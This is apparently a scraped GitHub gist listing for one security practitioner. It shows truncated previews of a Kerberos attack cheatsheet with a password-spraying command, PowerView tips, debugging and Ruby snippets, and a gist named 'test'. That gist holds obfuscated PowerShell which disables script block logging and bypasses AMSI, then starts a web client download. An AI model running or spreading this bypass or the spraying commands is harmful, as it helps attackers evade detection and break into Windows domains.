Skip to content

Instantly share code, notes, and snippets.

robvinson /
Created Jul 25, 2020 — forked from TarlogicSecurity/
A cheatsheet with commands that can be used to perform kerberos attacks

Kerberos cheatsheet



python -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>

With Rubeus version with brute module:

robvinson / PowerView-3.0-tricks.ps1
Created Jun 25, 2020 — forked from HarmJ0y/PowerView-3.0-tricks.ps1
PowerView-3.0 tips and tricks
View PowerView-3.0-tricks.ps1
# PowerView's last major overhaul is detailed here:
# tricks for the 'old' PowerView are at
# the most up-to-date version of PowerView will always be in the dev branch of PowerSploit:
# New function naming schema:
# Verbs:
# Get : retrieve full raw data sets
# Find : ‘find’ specific data entries in a data set
View test
IF($PSVerSIonTabLE.PSVeRsIon.MAJoR -Ge 3){$GPF=[Ref].ASsemBlY.GETTYpe('System.Management.Automation.Utils')."GEtFIE`Ld"('cachedGroupPolicySettings','N'+'onPublic,Static');IF($GPF){$GPC=$GPF.GetVaLUe($nuLl);IF($GPC['ScriptB'+'lockLogging']){$GPC['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging']=0;$GPC['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging']=0}$VAL=[CollECTIONS.GEnerIc.DICtiONaRY[STriNg,SyStEM.OBJecT]]::NeW();$VaL.ADD('EnableScriptB'+'lockLogging',0);$VAL.ADd('EnableScriptBlockInvocationLogging',0);$GPC['HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\ScriptB'+'lockLogging']=$VAl}ELsE{[SCrIPTBLock]."GetFie`LD"('signatures','N'+'onPublic,Static').SetVAlUE($NUll,(NEw-OBJECt CollectIons.GenERIc.HAshSeT[strINg]))}[REF].AssEMBLY.GEtType('System.Management.Automation.AmsiUtils')|?{$_}|%{$_.GEtFieLd('amsiInitFailed','NonPublic,Static').SETVALuE($nULL,$true)};};[SYStEM.NET.SERVIcePOINtMANaGER]::ExPEcT100CoNTiNue=0;$Wc=NEw-OBJeCt SysTEM.NeT.WebCLIEnt;$u='Mozilla/5.0 (compat

Keybase proof

I hereby claim:

  • I am robvinson on github.
  • I am robvinson ( on keybase.
  • I have a public key whose fingerprint is A820 6BA2 B5A5 D565 5BBD 8F76 50EB 0F9C B6B6 8E33

To claim this, I am signing this object:

View iteration-guesser.rb
#!/usr/bin/env ruby
require 'openssl'
SHA1 =
# Verified functionality against
# Test Vector (
# Input:
# P = "password" (8 octets)
View parse_encrypt_dump_file.c
To be used with an output file created by breaking
on the encrypt function with gdb, and grabbing it's
attach --waitfor SomeProgram
break encrypt
View tracer.gdb
set logging file /tmp/Good-log.txt
set logging on
attach --waitfor Good
### Generic objective-c tracing
b objc_msgSend
# print class name and method name
printf "-[%s %s]\n", (char *)class_getName(*(long *)$r0,$r1),$r1
robvinson / gist:3504621
Created Aug 28, 2012
ruby preforking test program
View gist:3504621
#!/usr/bin/env ruby
# The trap is guaranteed to happen, and guaranteed to happen only
# once, right before the process exits for any reason (unless
# it's terminated with a SIGKILL).
#trap('EXIT') { acceptor.close }
CONTROL[0], CONTROL[1] = IO.pipe
robvinson /
Created May 18, 2012
Get index page from web servers
mkdir $DSTDIR
is_empty() {
if [ -s $1 ]; then #exists and is not empty
return 1
if [ -f $1 ]; then #file exists and is empty
You can’t perform that action at this time.